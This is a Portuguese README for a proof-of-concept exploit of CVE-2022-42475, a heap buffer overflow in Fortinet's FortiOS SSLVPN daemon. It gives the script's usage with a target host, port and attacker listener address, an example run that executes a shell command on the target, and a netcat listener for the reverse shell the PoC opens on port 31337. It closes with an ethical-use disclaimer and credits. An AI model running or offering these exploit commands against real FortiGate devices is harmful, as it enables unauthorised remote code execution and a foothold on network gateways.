
Vulnerabilidade de estouro de buffer no FortiOS
https://nvd.nist.gov/vuln/detail/CVE-2022-42475 Código POC para explorar o estouro de heap no daemon SSLVPN da Fortinet
Este é um POC rápido e sujo que provavelmente não funcionará em lugar nenhum, a menos que você tenha muita sorte. Depende da versão e contém alguns offsets hardcoded que muito provavelmente mudarão de um sistema para outro.
python3 cve-2022-42475.py rhost rport lhost 'comando'
python3 cve-2022-42475.py 192.168.10.1 8443 10.10.1.1 'ls -la /'
O POC usa um comando python para configurar um shell reverso na porta 31337
nc -lvnp 31337
Este projeto é feito apenas para fins educacionais e de teste ético. O uso desta ferramenta para atacar alvos sem consentimento mútuo prévio é ilegal. Os desenvolvedores não assumem nenhuma responsabilidade e não são responsáveis por qualquer uso indevido ou dano causado por esta ferramenta.
Agradecimentos a Alain M - Twitter : @plopz0r